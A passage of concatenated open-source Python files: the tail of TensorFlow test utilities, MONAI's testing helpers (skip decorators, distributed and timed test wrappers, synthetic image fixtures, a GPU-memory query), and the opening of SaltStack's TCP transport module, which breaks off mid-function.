worker_config: (optional) ConfigProto to initialize workers. Can be used
to instantiate multiple devices etc.
ps_config: (optional) ConfigProto to initialize PS servers.
Returns:
A tuple `(worker_servers, ps_servers)`. `worker_servers` is a list
of `num_workers` objects of type `tf.train.Server` (all running locally);
and `ps_servers` is a list of `num_ps` objects of similar type.
Raises:
ImportError: if portpicker module was not found at load time
"""
if _portpicker_import_error:
raise _portpicker_import_error # pylint: disable=raising-bad-type
worker_ports = [portpicker.pick_unused_port() for _ in range(num_workers)]
ps_ports = [portpicker.pick_unused_port() for _ in range(num_ps)]
cluster_dict = {
"worker": ["localhost:%s" % port for port in worker_ports],
"ps": ["localhost:%s" % port for port in ps_ports]
}
cs = server_lib.ClusterSpec(cluster_dict)
workers = [
server_lib.Server(
cs,
job_name="worker",
protocol=protocol,
task_index=ix,
config=worker_config,
start=True) for ix in range(num_workers)
]
ps_servers = [
server_lib.Server(
cs,
job_name="ps",
protocol=protocol,
task_index=ix,
config=ps_config,
start=True) for ix in range(num_ps)
]
return workers, ps_servers
def get_node_def_from_graph(node_name, graph_def):
"""Returns the `NodeDef` instance for given node name in the graph def.
This method explores only the NodeDefs in `graph_def.node`.
Args:
node_name: Name of the NodeDef to search for.
graph_def: An instance of `GraphDef` proto.
Returns:
the `NodeDef` instance whose name field matches the given node_name or None.
"""
for node_def in graph_def.node:
if node_def.name == node_name:
return node_def
return None
def set_producer_version(graph, producer_version):
"""Sets graph.graph_def_versions.producer to `producer_version`."""
# The C API doesn't expose altering GraphDefVersions. We can indirectly set
# it via import_graph_def though.
graph_def = graph_pb2.GraphDef()
graph_def.versions.producer = producer_version
with graph.as_default():
importer.import_graph_def(graph_def)
assert graph.graph_def_versions.producer, producer_version
def dismantle_func_graph(func_graph):
"""Removes reference cycles in `func_graph` FuncGraph.
Helpful for making sure the garbage collector doesn't need to run when
the FuncGraph goes out of scope, e.g. in tests using defun with
@test_util.run_in_graph_and_eager_modes(assert_no_eager_garbage=True).
Args:
func_graph: A `FuncGraph` object to destroy. `func_graph` is unusable
after this function.
"""
# TODO(b/115366440): Delete this method when a custom OrderedDict is added.
# Clearing captures using clear() leaves some cycles around.
while func_graph.captures:
func_graph.captures.popitem()
memory.dismantle_ordered_dict(func_graph.captures)
ops.dismantle_graph(func_graph)
def dismantle_polymorphic_function(func):
"""Removes reference cycles in PolymorphicFunction `func`.
Helpful for making sure the garbage collector doesn't need to run when
PolymorphicFunction goes out of scope, e.g. in tests using defun with
@test_util.run_in_graph_and_eager_modes(assert_no_eager_garbage=True).
Args:
func: A `PolymorphicFunction` object to destroy. `func` is unusable
after this function.
"""
# TODO(b/115366440): Delete this method when a custom OrderedDict is added
cache = func._function_cache # pylint: disable=protected-access
for concrete_func in cache.values():
dismantle_func_graph(concrete_func.graph)
while cache:
cache.popitem()
memory.dismantle_ordered_dict(cache)
|
utils.py
|
# Copyright (c) MONAI Consortium
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import copy
import datetime
import functools
import importlib
import json
import operator
import os
import queue
import sys
import tempfile
import time
import traceback
import unittest
import warnings
from contextlib import contextmanager
from functools import partial, reduce
from subprocess import PIPE, Popen
from typing import Callable, Optional, Tuple
from urllib.error import ContentTooShortError, HTTPError
import numpy as np
import torch
import torch.distributed as dist
from monai.apps.utils import download_url
from monai.config import NdarrayTensor
from monai.config.deviceconfig import USE_COMPILED
from monai.config.type_definitions import NdarrayOrTensor
from monai.data import create_test_image_2d, create_test_image_3d
from monai.networks import convert_to_torchscript
from monai.utils import optional_import
from monai.utils.module import pytorch_after, version_leq
from monai.utils.type_conversion import convert_data_type
nib, _ = optional_import("nibabel")
quick_test_var = "QUICKTEST"
_tf32_enabled = None
_test_data_config: dict = {}
def testing_data_config(*keys):
"""get _test_data_config[keys0][keys1]...[keysN]"""
if not _test_data_config:
with open(os.path.join(os.path.dirname(__file__), "testing_data", "data_config.json")) as c:
_config = json.load(c)
for k, v in _config.items():
_test_data_config[k] = v
return reduce(operator.getitem, keys, _test_data_config)
def clone(data: NdarrayTensor) -> NdarrayTensor:
"""
Clone data independent of type.
Args:
data (NdarrayTensor): This can be a Pytorch Tensor or numpy array.
Returns:
Any: Cloned data object
"""
return copy.deepcopy(data)
def assert_allclose(
actual: NdarrayOrTensor,
desired: NdarrayOrTensor,
type_test: bool = True,
device_test: bool = False,
*args,
**kwargs,
):
"""
Assert that types and all values of two data objects are close.
Args:
actual: Pytorch Tensor or numpy array for comparison.
desired: Pytorch Tensor or numpy array to compare against.
type_test: whether to test that `actual` and `desired` are both numpy arrays or torch tensors.
device_test: whether to test the device property.
args: extra arguments to pass on to `np.testing.assert_allclose`.
kwargs: extra arguments to pass on to `np.testing.assert_allclose`.
"""
if type_test:
# check both actual and desired are of the same type
np.testing.assert_equal(isinstance(actual, np.ndarray), isinstance(desired, np.ndarray), "numpy type")
np.testing.assert_equal(isinstance(actual, torch.Tensor), isinstance(desired, torch.Tensor), "torch type")
if isinstance(desired, torch.Tensor) or isinstance(actual, torch.Tensor):
if device_test:
np.testing.assert_equal(str(actual.device), str(desired.device), "torch device check") # type: ignore
actual = actual.cpu().numpy() if isinstance(actual, torch.Tensor) else actual
desired = desired.cpu().numpy() if isinstance(desired, torch.Tensor) else desired
np.testing.assert_allclose(actual, desired, *args, **kwargs)
@contextmanager
def skip_if_downloading_fails():
try:
yield
except (ContentTooShortError, HTTPError, ConnectionError) as e:
raise unittest.SkipTest(f"error while downloading: {e}") from e
except RuntimeError as rt_e:
if "unexpected EOF" in str(rt_e):
raise unittest.SkipTest(f"error while downloading: {rt_e}") from rt_e # incomplete download
if "network issue" in str(rt_e):
raise unittest.SkipTest(f"error while downloading: {rt_e}") from rt_e
if "gdown dependency" in str(rt_e): # no gdown installed
raise unittest.SkipTest(f"error while downloading: {rt_e}") from rt_e
if "md5 check" in str(rt_e):
raise unittest.SkipTest(f"error while downloading: {rt_e}") from rt_e
raise rt_e
def test_pretrained_networks(network, input_param, device):
with skip_if_downloading_fails():
return network(**input_param).to(device)
def test_is_quick():
return os.environ.get(quick_test_var, "").lower() == "true"
def is_tf32_env():
"""
The environment variable NVIDIA_TF32_OVERRIDE=0 will override any defaults
or programmatic configuration of NVIDIA libraries, and consequently,
cuBLAS will not accelerate FP32 computations with TF32 tensor cores.
"""
global _tf32_enabled
if _tf32_enabled is None:
_tf32_enabled = False
if (
torch.cuda.is_available()
and not version_leq(f"{torch.version.cuda}", "10.100")
and os.environ.get("NVIDIA_TF32_OVERRIDE", "1") != "0"
and torch.cuda.device_count() > 0 # at least 11.0
):
try:
# with TF32 enabled, the speed is ~8x faster, but the precision has ~2 digits less in the result
g_gpu = torch.Generator(device="cuda")
g_gpu.manual_seed(2147483647)
a_full = torch.randn(1024, 1024, dtype=torch.double, device="cuda", generator=g_gpu)
b_full = torch.randn(1024, 1024, dtype=torch.double, device="cuda", generator=g_gpu)
_tf32_enabled = (a_full.float() @ b_full.float() - a_full @ b_full).abs().max().item() > 0.001 # 0.1713
except BaseException:
pass
print(f"tf32 enabled: {_tf32_enabled}")
return _tf32_enabled
def skip_if_quick(obj):
"""
Skip the unit tests if environment variable `quick_test_var=true`.
For example, the user can skip the relevant tests by setting ``export QUICKTEST=true``.
"""
is_quick = test_is_quick()
return unittest.skipIf(is_quick, "Skipping slow tests")(obj)
class SkipIfNoModule:
"""Decorator to be used if test should be skipped
when optional module is not present."""
def __init__(self, module_name):
self.module_name = module_name
self.module_missing = not optional_import(self.module_name)[1]
def __call__(self, obj):
return unittest.skipIf(self.module_missing, f"optional module not present: {self.module_name}")(obj)
class SkipIfModule:
"""Decorator to be used if test should be skipped
when optional module is present."""
def __init__(self, module_name):
self.module_name = module_name
self.module_avail = optional_import(self.module_name)[1]
def __call__(self, obj):
return unittest.skipIf(self.module_avail, f"Skipping because optional module present: {self.module_name}")(obj)
def skip_if_no_cpp_extension(obj):
"""
Skip the unit tests if the cpp extension is not available
"""
return unittest.skipUnless(USE_COMPILED, "Skipping cpp extension tests")(obj)
def skip_if_no_cuda(obj):
"""
Skip the unit tests if torch.cuda.is_available is False
"""
return unittest.skipUnless(torch.cuda.is_available(), "Skipping CUDA-based tests")(obj)
def skip_if_windows(obj):
"""
Skip the unit tests if platform is win32
"""
return unittest.skipIf(sys.platform == "win32", "Skipping tests on Windows")(obj)
class SkipIfBeforePyTorchVersion:
"""Decorator to be used if test should be skipped
with PyTorch versions older than that given."""
def __init__(self, pytorch_version_tuple):
self.min_version = pytorch_version_tuple
self.version_too_old = not pytorch_after(*pytorch_version_tuple)
def __call__(self, obj):
return unittest.skipIf(
self.version_too_old, f"Skipping tests that fail on PyTorch versions before: {self.min_version}"
)(obj)
class SkipIfAtLeastPyTorchVersion:
"""Decorator to be used if test should be skipped
with PyTorch versions newer than or equal to that given."""
def __init__(self, pytorch_version_tuple):
self.max_version = pytorch_version_tuple
self.version_too_new = pytorch_after(*pytorch_version_tuple)
def __call__(self, obj):
return unittest.skipIf(
self.version_too_new, f"Skipping tests that fail on PyTorch versions at least: {self.max_version}"
)(obj)
def has_cupy():
"""
Returns True if the user has installed a version of cupy.
"""
cp, has_cp = optional_import("cupy")
if not has_cp:
return False
try: # test cupy installation with a basic example
x = cp.arange(6, dtype="f").reshape(2, 3)
y = cp.arange(3, dtype="f")
kernel = cp.ElementwiseKernel(
"float32 x, float32 y", "float32 z", """ if (x - 2 > y) { z = x * y; } else { z = x + y; } """, "my_kernel"
)
return kernel(x, y)[0, 0] == 0
except Exception:
return False
HAS_CUPY = has_cupy()
def make_nifti_image(array: NdarrayOrTensor, affine=None, dir=None, fname=None, suffix=".nii.gz", verbose=False):
"""
Create a temporary nifti image on the disk and return the image name.
User is responsible for deleting the temporary file when done with it.
"""
if isinstance(array, torch.Tensor):
array, *_ = convert_data_type(array, np.ndarray)
if isinstance(affine, torch.Tensor):
affine, *_ = convert_data_type(affine, np.ndarray)
if affine is None:
affine = np.eye(4)
test_image = nib.Nifti1Image(array, affine)
# if dir not given, create random. Else, make sure it exists.
if dir is None:
dir = tempfile.mkdtemp()
else:
os.makedirs(dir, exist_ok=True)
# If fname not given, get random one. Else, concat dir, fname and suffix.
if fname is None:
temp_f, fname = tempfile.mkstemp(suffix=suffix, dir=dir)
os.close(temp_f)
else:
fname = os.path.join(dir, fname + suffix)
nib.save(test_image, fname)
if verbose:
print(f"File written: {fname}.")
return fname
def make_rand_affine(ndim: int = 3, random_state: Optional[np.random.RandomState] = None):
"""Create random affine transformation (with values == -1, 0 or 1)."""
rs = np.random.random.__self__ if random_state is None else random_state # type: ignore
vals = rs.choice([-1, 1], size=ndim)
positions = rs.choice(range(ndim), size=ndim, replace=False)
af = np.zeros([ndim + 1, ndim + 1])
af[ndim, ndim] = 1
for i, (v, p) in enumerate(zip(vals, positions)):
af[i, p] = v
return af
class DistTestCase(unittest.TestCase):
"""
testcase without _outcome, so that it's picklable.
"""
def __getstate__(self):
self_dict = self.__dict__.copy()
del self_dict["_outcome"]
return self_dict
def __setstate__(self, data_dict):
self.__dict__.update(data_dict)
class DistCall:
"""
Wrap a test case so that it will run in multiple processes on a single machine using `torch.distributed`.
It is designed to be used with `tests.utils.DistTestCase`.
Usage:
decorate a unittest testcase method with a `DistCall` instance::
class MyTests(unittest.TestCase):
@DistCall(nnodes=1, nproc_per_node=3, master_addr="localhost")
def test_compute(self):
...
the `test_compute` method should trigger different worker logic according to `dist.get_rank()`.
Multi-node tests require a fixed master_addr:master_port, with node_rank set manually in multiple scripts
or from environment variable "NODE_RANK".
"""
def __init__(
self,
nnodes: int = 1,
nproc_per_node: int = 1,
master_addr: str = "localhost",
master_port: Optional[int] = None,
node_rank: Optional[int] = None,
timeout=60,
init_method=None,
backend: Optional[str] = None,
daemon: Optional[bool] = None,
method: Optional[str] = "spawn",
verbose: bool = False,
):
"""
Args:
nnodes: The number of nodes to use for distributed call.
nproc_per_node: The number of processes to call on each node.
master_addr: Master node (rank 0)'s address, should be either the IP address or the hostname of node 0.
master_port: Master node (rank 0)'s free port.
node_rank: The rank of the node, this could be set via environment variable "NODE_RANK".
timeout: Timeout for operations executed against the process group.
init_method: URL specifying how to initialize the process group.
Default is "env://" or "file:///d:/a_temp" (windows) if unspecified.
backend: The backend to use. Depending on build-time configurations,
valid values include ``mpi``, ``gloo``, and ``nccl``.
daemon: the process’s daemon flag.
When daemon=None, the initial value is inherited from the creating process.
method: set the method which should be used to start a child process.
method can be 'fork', 'spawn' or 'forkserver'.
verbose: whether to print NCCL debug info.
"""
self.nnodes = int(nnodes)
self.nproc_per_node = int(nproc_per_node)
if self.nnodes < 1 or self.nproc_per_node < 1:
raise ValueError(
f"number of nodes and processes per node must be >= 1, got {self.nnodes} and {self.nproc_per_node}"
)
self.node_rank = int(os.environ.get("NODE_RANK", "0")) if node_rank is None else int(node_rank)
self.master_addr = master_addr
self.master_port = np.random.randint(10000, 20000) if master_port is None else master_port
if backend is None:
self.backend = "nccl" if torch.distributed.is_nccl_available() and torch.cuda.is_available() else "gloo"
else:
self.backend = backend
self.init_method = init_method
if self.init_method is None and sys.platform == "win32":
self.init_method = "file:///d:/a_temp"
self.timeout = datetime.timedelta(0, timeout)
self.daemon = daemon
self.method = method
self.verbose = verbose
def run_process(self, func, local_rank, args, kwargs, results):
_env = os.environ.copy() # keep the original system env
try:
os.environ["MASTER_ADDR"] = self.master_addr
os.environ["MASTER_PORT"] = str(self.master_port)
os.environ["LOCAL_RANK"] = str(local_rank)
if self.verbose:
os.environ["NCCL_DEBUG"] = "INFO"
os.environ["NCCL_DEBUG_SUBSYS"] = "ALL"
os.environ["NCCL_BLOCKING_WAIT"] = str(1)
os.environ["OMP_NUM_THREADS"] = str(1)
os.environ["WORLD_SIZE"] = str(self.nproc_per_node * self.nnodes)
os.environ["RANK"] = str(self.nproc_per_node * self.node_rank + local_rank)
if torch.cuda.is_available():
torch.cuda.set_device(int(local_rank)) # using device ids from CUDA_VISIBILE_DEVICES
dist.init_process_group(
backend=self.backend,
init_method=self.init_method,
timeout=self.timeout,
world_size=int(os.environ["WORLD_SIZE"]),
rank=int(os.environ["RANK"]),
)
func(*args, **kwargs)
# the primary node lives longer to
# avoid _store_based_barrier, RuntimeError: Broken pipe
# as the TCP store daemon is on the rank 0
if int(os.environ["RANK"]) == 0:
time.sleep(0.1)
results.put(True)
except Exception as e:
results.put(False)
raise e
finally:
os.environ.clear()
os.environ.update(_env)
try:
dist.destroy_process_group()
except RuntimeError as e:
warnings.warn(f"While closing process group: {e}.")
def __call__(self, obj):
if not torch.distributed.is_available():
return unittest.skipIf(True, "Skipping distributed tests because not torch.distributed.is_available()")(obj)
if torch.cuda.is_available() and torch.cuda.device_count() < self.nproc_per_node:
return unittest.skipIf(
True,
f"Skipping distributed tests because it requires {self.nnodes} devices "
f"but got {torch.cuda.device_count()}",
)(obj)
_cache_original_func(obj)
@functools.wraps(obj)
def _wrapper(*args, **kwargs):
tmp = torch.multiprocessing.get_context(self.method)
processes = []
results = tmp.Queue()
func = _call_original_func
args = [obj.__name__, obj.__module__] + list(args)
for proc_rank in range(self.nproc_per_node):
p = tmp.Process(
target=self.run_process, args=(func, proc_rank, args, kwargs, results), daemon=self.daemon
)
p.start()
processes.append(p)
for p in processes:
p.join()
assert results.get(), "Distributed call failed."
_del_original_func(obj)
return _wrapper
class TimedCall:
"""
Wrap a test case so that it will run in a new process, raises a TimeoutError if the decorated method takes
more than `seconds` to finish. It is designed to be used with `tests.utils.DistTestCase`.
"""
def __init__(
self,
seconds: float = 60.0,
daemon: Optional[bool] = None,
method: Optional[str] = "spawn",
force_quit: bool = True,
skip_timing=False,
):
"""
Args:
seconds: timeout seconds.
daemon: the process’s daemon flag.
When daemon=None, the initial value is inherited from the creating process.
method: set the method which should be used to start a child process.
method can be 'fork', 'spawn' or 'forkserver'.
force_quit: whether to terminate the child process when `seconds` elapsed.
skip_timing: whether to skip the timing constraint.
this is useful to include some system conditions such as
`torch.cuda.is_available()`.
"""
self.timeout_seconds = seconds
self.daemon = daemon
self.force_quit = force_quit
self.skip_timing = skip_timing
self.method = method
@staticmethod
def run_process(func, args, kwargs, results):
try:
output = func(*args, **kwargs)
results.put(output)
except Exception as e:
e.traceback = traceback.format_exc()
results.put(e)
def __call__(self, obj):
if self.skip_timing:
return obj
_cache_original_func(obj)
@functools.wraps(obj)
def _wrapper(*args, **kwargs):
tmp = torch.multiprocessing.get_context(self.method)
func = _call_original_func
args = [obj.__name__, obj.__module__] + list(args)
results = tmp.Queue()
p = tmp.Process(target=TimedCall.run_process, args=(func, args, kwargs, results), daemon=self.daemon)
p.start()
p.join(timeout=self.timeout_seconds)
timeout_error = None
try:
if p.is_alive():
# create an Exception
timeout_error = torch.multiprocessing.TimeoutError(
f"'{obj.__name__}' in '{obj.__module__}' did not finish in {self.timeout_seconds}s."
)
if self.force_quit:
p.terminate()
else:
warnings.warn(
f"TimedCall: deadline ({self.timeout_seconds}s) "
f"reached but waiting for {obj.__name__} to finish."
)
finally:
p.join()
_del_original_func(obj)
res = None
try:
res = results.get(block=False)
except queue.Empty: # no result returned, took too long
pass
if isinstance(res, Exception): # other errors from obj
if hasattr(res, "traceback"):
raise RuntimeError(res.traceback) from res
raise res
if timeout_error: # no force_quit finished
raise timeout_error
return res
return _wrapper
_original_funcs = {}
def _cache_original_func(obj) -> None:
"""cache the original function by name, so that the decorator doesn't shadow it."""
global _original_funcs
_original_funcs[obj.__name__] = obj
def _del_original_func(obj):
"""pop the original function from cache."""
global _original_funcs
_original_funcs.pop(obj.__name__, None)
if torch.cuda.is_available(): # clean up the cached function
torch.cuda.synchronize()
torch.cuda.empty_cache()
def _call_original_func(name, module, *args, **kwargs):
if name not in _original_funcs:
_original_module = importlib.import_module(module) # reimport, refresh _original_funcs
if not hasattr(_original_module, name):
# refresh module doesn't work
raise RuntimeError(f"Could not recover the original {name} from {module}: {_original_funcs}.")
f = _original_funcs[name]
return f(*args, **kwargs)
class NumpyImageTestCase2D(unittest.TestCase):
im_shape = (128, 64)
input_channels = 1
output_channels = 4
num_classes = 3
def setUp(self):
im, msk = create_test_image_2d(
self.im_shape[0], self.im_shape[1], num_objs=4, rad_max=20, noise_max=0.0, num_seg_classes=self.num_classes
)
self.imt = im[None, None]
self.seg1 = (msk[None, None] > 0).astype(np.float32)
self.segn = msk[None, None]
class TorchImageTestCase2D(NumpyImageTestCase2D):
def setUp(self):
NumpyImageTestCase2D.setUp(self)
self.imt = torch.tensor(self.imt)
self.seg1 = torch.tensor(self.seg1)
self.segn = torch.tensor(self.segn)
class NumpyImageTestCase3D(unittest.TestCase):
im_shape = (64, 48, 80)
input_channels = 1
output_channels = 4
num_classes = 3
def setUp(self):
im, msk = create_test_image_3d(
self.im_shape[0],
self.im_shape[1],
self.im_shape[2],
num_objs=4,
rad_max=20,
noise_max=0.0,
num_seg_classes=self.num_classes,
)
self.imt = im[None, None]
self.seg1 = (msk[None, None] > 0).astype(np.float32)
self.segn = msk[None, None]
class TorchImageTestCase3D(NumpyImageTestCase3D):
def setUp(self):
NumpyImageTestCase3D.setUp(self)
self.imt = torch.tensor(self.imt)
self.seg1 = torch.tensor(self.seg1)
self.segn = torch.tensor(self.segn)
def test_script_save(net, *inputs, device=None, rtol=1e-4, atol=0.0):
"""
Test the ability to save `net` as a Torchscript object, reload it, and apply inference. The value `inputs` is
forward-passed through the original and loaded copy of the network and their results returned.
The forward pass for both is done without gradient accumulation.
The test will be performed with CUDA if available, else CPU.
"""
# TODO: would be nice to use GPU if available, but it currently causes CI failures.
device = "cpu"
with tempfile.TemporaryDirectory() as tempdir:
convert_to_torchscript(
model=net,
filename_or_obj=os.path.join(tempdir, "model.ts"),
verify=True,
inputs=inputs,
device=device,
rtol=rtol,
atol=atol,
)
def download_url_or_skip_test(*args, **kwargs):
"""``download_url`` and skip the tests if any downloading error occurs."""
with skip_if_downloading_fails():
download_url(*args, **kwargs)
def query_memory(n=2):
"""
Find best n idle devices and return a string of device ids using the `nvidia-smi` command.
"""
bash_string = "nvidia-smi --query-gpu=power.draw,temperature.gpu,memory.used --format=csv,noheader,nounits"
try:
p1 = Popen(bash_string.split(), stdout=PIPE)
output, error = p1.communicate()
free_memory = [x.split(",") for x in output.decode("utf-8").split("\n")[:-1]]
free_memory = np.asarray(free_memory, dtype=float).T
free_memory[1] += free_memory[0] # combine 0/1 column measures
ids = np.lexsort(free_memory)[:n]
except (TypeError, IndexError, OSError):
ids = range(n) if isinstance(n, int) else []
return ",".join(f"{int(x)}" for x in ids)
TEST_NDARRAYS: Tuple[Callable] = (np.array, torch.as_tensor) # type: ignore
if torch.cuda.is_available():
gpu_tensor: Callable = partial(torch.as_tensor, device="cuda")
TEST_NDARRAYS = TEST_NDARRAYS + (gpu_tensor,) # type: ignore
if __name__ == "__main__":
print(query_memory())
|
tcp.py
|
# -*- coding: utf-8 -*-
'''
TCP transport classes
Wire protocol: "len(payload) msgpack({'head': SOMEHEADER, 'body': SOMEBODY})"
'''
# Import Python Libs
from __future__ import absolute_import, print_function, unicode_literals
import logging
import msgpack
import socket
import os
import weakref
import time
import traceback
import errno
# Import Salt Libs
import salt.crypt
import salt.utils.asynchronous
import salt.utils.event
import salt.utils.platform
import salt.utils.process
import salt.utils.verify
import salt.payload
import salt.exceptions
import salt.transport.frame
import salt.transport.ipc
import salt.transport.client
import salt.transport.server
import salt.transport.mixins.auth
from salt.ext import six
from salt.exceptions import SaltReqTimeoutError, SaltClientError
from salt.transport import iter_transport_opts
# Import Tornado Libs
import tornado
import tornado.tcpserver
import tornado.gen
import tornado.concurrent
import tornado.tcpclient
import tornado.netutil
# pylint: disable=import-error,no-name-in-module
if six.PY2:
import urlparse
else:
import urllib.parse as urlparse
# pylint: enable=import-error,no-name-in-module
# Import third party libs
try:
from M2Crypto import RSA
HAS_M2 = True
except ImportError:
HAS_M2 = False
try:
from Cryptodome.Cipher import PKCS1_OAEP
except ImportError:
from Crypto.Cipher import PKCS1_OAEP
if six.PY3 and salt.utils.platform.is_windows():
USE_LOAD_BALANCER = True
else:
USE_LOAD_BALANCER = False
if USE_LOAD_BALANCER:
import threading
import multiprocessing
import errno
import tornado.util
from salt.utils.process import SignalHandlingMultiprocessingProcess
log = logging.getLogger(__name__)
def _set_tcp_keepalive(sock, opts):
'''
Ensure that TCP keepalives are set for the socket.
'''
if hasattr(socket, 'SO_KEEPALIVE'):
if opts.get('tcp_keepalive', False):
sock.setsockopt(socket.SOL_SOCKET, socket.SO_KEEPALIVE, 1)
if hasattr(socket, 'SOL_TCP'):
if hasattr(socket, 'TCP_KEEPIDLE'):
tcp_keepalive_idle = opts.get('tcp_keepalive_idle', -1)
if tcp_keepalive_idle > 0:
sock.setsockopt(
socket.SOL_TCP, socket.TCP_KEEPIDLE,
int(tcp_keepalive_idle))
if hasattr(socket, 'TCP_KEEPCNT'):
tcp_keepalive_cnt = opts.get('tcp_keepalive_cnt', -1)
if tcp_keepalive_cnt > 0:
sock.setsockopt(
socket.SOL_TCP, socket.TCP_KEEPCNT,
int(tcp_keepalive_cnt))
if hasattr(socket, 'TCP_KEEPINTVL'):
tcp_keepalive_intvl = opts.get('tcp_keepalive_intvl', -1)
if tcp_keepalive_intvl > 0:
sock.setsockopt(
socket.SOL_TCP, socket.TCP_KEEPINTVL,
int(tcp_keepalive_intvl))
if hasattr(socket, 'SIO_KEEPALIVE_VALS'):
# Windows doesn't support TCP_KEEPIDLE, TCP_KEEPCNT, nor
# TCP_KEEPINTVL. Instead, it has its own proprietary
# SIO_KEEPALIVE_VALS.
tcp_keepalive_idle = opts.get('tcp_keepalive_idle', -1)
tcp_keepalive_intvl = opts.get('tcp_keepalive_intvl', -1)
# Windows doesn't support changing something equivalent to
# TCP_KEEPCNT.
if tcp_keepalive_idle > 0 or tcp_keepalive_intvl > 0:
# Windows defaults may be found by using the link below.
# Search for 'KeepAliveTime' and 'KeepAliveInterval'.
# https://technet.microsoft.com/en-us/library/bb726981.aspx#EDAA
# If one value is set and the other isn't, we still need
# to send both values to SIO_KEEPALIVE_VALS and they both
# need to be valid. So in that case, use the Windows
# default.
if tcp_keepalive_idle <= 0:
tcp_keepalive_idle = 7200
if tcp_keepalive_intvl <= 0:
tcp_keepalive_intvl = 1
# The values expected are in milliseconds, so multiply by
# 1000.
sock.ioctl(socket.SIO_KEEPALIVE_VALS, (
1, int(tcp_keepalive_idle * 1000),
int(tcp_keepalive_intvl * 1000)))
else:
sock.setsockopt(socket.SOL_SOCKET, socket.SO_KEEPALIVE, 0)
if USE_LOAD_BALANCER:
class LoadBalancerServer(SignalHandlingMultiprocessingProcess):
'''
Raw TCP server which runs in its own process and will listen
for incoming connections. Each incoming connection will be
sent via multiprocessing queue to the workers.
Since the queue is shared amongst workers, only one worker will
handle a given connection.
'''
# TODO: opts!
# Based on default used in tornado.netutil.bind_sockets()
backlog = 128
def __init__(self, opts, socket_queue, log_queue=None):
super(LoadBalancerServer, self).__init__(log_queue=log_queue)
self.opts = opts
self.socket_queue = socket_queue
self._socket = None
# __setstate__ and __getstate__ are only used on Windows.
# We do this so that __init__ will be invoked on Windows in the child
# process so that a register_after_fork() equivalent will work on
# Windows.
def __setstate__(self, state):
self._is_child = True
self.__init__(
state['opts'],
state['socket_queue'],
log_queue=state['log_queue']
)
def __getstate__(self):
return {'opts': self.opts,
'socket_queue': self.socket_queue,
'log_queue': self.log_queue}
def close(self):
if self._socket is not None:
self._socket.shutdown(socket.SHUT_RDWR)
self._socket.close()
self._socket = None
def __del__(self):
self.close()
def run(self):
'''
Start the load balancer
'''
self._socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self._socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
_set_tcp_keepalive(self._socket, self.opts)
self._socket.setblocking(1)
self._socket.bind((self.opts['interface'], int(self.opts['ret_port'])))
self._socket.listen(self.backlog)
while True:
try:
# Wait for a connection to occur since the socket is
# blocking.
connection, address = self._socket.accept()
# Wait for a free slot to be available to put
# the connection into.
# Sockets are picklable on Windows in Python 3.
self.socket_queue.put((connection, address), True, None)
except socket.error as e:
# ECONNABORTED indicates that there was a connection
# but it was closed while still in the accept queue.
# (observed on FreeBSD).
if tornado.util.errno_from_exception(e) == errno.ECONNABORTED:
continue
raise
# TODO: move serial down into message library
class AsyncTCPReqChannel(salt.transport.client.ReqChannel):
'''
Encapsulate sending routines to tcp.
Note: this class returns a singleton
'''
# This class is only a singleton per minion/master pair
# mapping of io_loop -> {key -> channel}
instance_map = weakref.WeakKeyDictionary()
def __new__(cls, opts, **kwargs):
'''
Only create one instance of channel per __key()
'''
# do we have any mapping for this io_loop
io_loop = kwargs.get('io_loop') or tornado.ioloop.IOLoop.current()
if io_loop not in cls.instance_map:
cls.instance_map[io_loop] = weakref.WeakValueDictionary()
loop_instance_map = cls.instance_map[io_loop]
key = cls.__key(opts, **kwargs)
obj = loop_instance_map.get(key)
if obj is None:
log.debug('Initializing new AsyncTCPReqChannel for %s', key)
# we need to make a local variable for this, as we are going to store
# it in a WeakValueDictionary-- which will remove the item if no one
# references it-- this forces a reference while we return to the caller
obj = object.__new__(cls)
obj.__singleton_init__(opts, **kwargs)
loop_instance_map[key] = obj
else:
log.debug('Re-using AsyncTCPReqChannel for %s', key)
return obj
@classmethod
def __key(cls, opts, **kwargs):
if 'master_uri' in kwargs:
opts['master_uri'] = kwargs['master_uri']
return (opts['pki_dir'], # where the keys are stored
opts['id'], # minion ID
opts['master_uri'],
kwargs.get('crypt', 'aes'), # TODO: use the same channel for crypt
)
# has to remain empty for singletons, since __init__ will *always* be called
def __init__(self, opts, **kwargs):
pass
# an init for the singleton instance to call
def __singleton_init__(self, opts, **kwargs):
self.opts = dict(opts)
self.serial = salt.payload.Serial(self.opts)
# crypt defaults to 'aes'
self.crypt = kwargs.get('crypt', 'aes')
self.io_loop = kwargs.get('io_loop') or tornado.ioloop.IOLoop.current()
if self.crypt != 'clear':
self.auth = salt.crypt.AsyncAuth(self.opts, io_loop=self.io_loop)
resolver = kwargs.get('resolver')
parse = urlparse.urlparse(self.opts['master_uri'])
master_host, master_port = parse.netloc.rsplit(':', 1)
self.master_addr = (master_host, int(master_port))
self._closing = False
self.message_client = SaltMessageClientPool(self.opts,
args=(self.opts, master_host, int(master_port),),
kwargs={'io_loop': self.io_loop, 'resolver': resolver,
'source_ip': self.opts.get('source_ip'),
'source_port': self.opts.get('source_ret_port')})
def close(self):
if self._closing:
return
self._closing = True
self.message_client.close()
def __del__(self):
self.close()
def _package_load(self, load):
return {
'enc': self.crypt,
'load': load,
}
@tornado.gen.coroutine
def crypted_transfer_decode_dictentry(self, load, dictkey=None, tries=3, timeout=60):
if not self.auth.authenticated:
yield self.auth.authenticate()
ret = yield self.message_client.send(self._package_load(self.auth.crypticle.dumps(load)), timeout=timeout)
key = self.auth.get_keys()
if HAS_M2:
aes = key.private_decrypt(ret['key'], RSA.pkcs1_oaep_padding)
else:
cipher = PKCS1_OAEP.new(key)
aes = cipher.decrypt(ret['key'])
pcrypt = salt.crypt.Crypticle(self.opts, aes)
data = pcrypt.loads(ret[dictkey])
if six.PY3:
data = salt.transport.frame.decode_embedded_strs(data)
raise tornado.gen.Return(data)
@tornado.gen.coroutine
def _crypted_transfer(self, load, tries=3, timeout=60):
'''
In case of authentication errors, try to renegotiate authentication
and retry the method.
Indeed, we can fail too early in case of a master restart during a
minion state execution call
'''
@tornado.gen.coroutine
def _do_transfer():
